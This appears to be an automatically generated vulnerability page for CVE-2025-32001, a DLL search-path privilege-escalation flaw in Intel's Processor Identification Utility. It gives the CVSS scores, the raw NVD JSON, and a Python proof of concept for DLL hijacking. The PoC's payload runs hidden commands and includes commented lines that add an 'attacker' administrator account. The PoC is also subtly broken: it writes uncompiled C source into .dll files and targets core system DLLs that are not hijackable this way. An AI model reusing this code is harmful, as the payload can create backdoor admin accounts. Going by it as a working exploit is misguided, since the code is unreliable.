Security Vulnerability Report
中文
CVE-2025-32001 CVSS 6.7 MEDIUM

CVE-2025-32001

Published: 2025-11-11 17:15:49
Last Modified: 2026-04-15 00:35:42

Description

Uncontrolled search path for the Intel(R) Processor Identification Utility before version 8.0.43 within Ring 3: User Applications may allow an escalation of privilege. System software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Intel(R) Processor Identification Utility < 8.0.43

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-32001 PoC - DLL Search Order Hijacking # This PoC demonstrates the uncontrolled search path vulnerability # in Intel Processor Identification Utility import os import ctypes from ctypes import wintypes # Malicious DLL that will be planted in the search path MALICIOUS_DLL_CODE = ''' #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { // Create elevated command prompt or execute payload WinExec("cmd.exe /c whoami > C:\\\\temp\\\\pwned.txt", SW_HIDE); // Or execute arbitrary code with elevated privileges // system("net user attacker P@ssw0rd /add"); // system("net localgroup Administrators attacker /add"); } return TRUE; } ''' def create_malicious_dll(output_path): """Generate malicious DLL for exploitation""" with open(output_path, 'w') as f: f.write(MALICIOUS_DLL_CODE) print(f"[+] Malicious DLL created at: {output_path}") def plant_dll_in_search_path(target_dir, dll_name): """Plant malicious DLL in application search path""" dll_path = os.path.join(target_dir, dll_name) create_malicious_dll(dll_path) print(f"[+] DLL planted in search path: {dll_path}") print("[+] Waiting for victim to launch Intel Processor Identification Utility...") def check_vulnerability(target_exe): """Check if target application is vulnerable""" if os.path.exists(target_exe): print(f"[+] Target application found: {target_exe}") print("[+] Application may be vulnerable to DLL search order hijacking") else: print("[-] Target application not found") if __name__ == "__main__": # Common DLL names that Intel Processor ID Utility might load common_dlls = ["kernel32.dll", "user32.dll", "advapi32.dll"] # Target application path target_app = "C:\\\\Program Files (x86)\\\\Intel\\\\Intel(R) Processor Identification Utility\\\\IntelProcessorId.exe" # Directory to plant DLL (e.g., application directory or PATH) plant_directory = os.path.dirname(target_app) check_vulnerability(target_app) # Plant malicious DLL for dll in common_dlls: plant_dll_in_search_path(plant_directory, dll) print("\n[!] Note: This PoC is for educational and authorized testing purposes only.") print("[!] Actual exploitation requires: local access + user interaction + vulnerable version")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-32001", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:48.743", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled search path for the Intel(R) Processor Identification Utility before version 8.0.43 within Ring 3: User Applications may allow an escalation of privilege. System software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01334.html", "source": "[email protected]"}]}}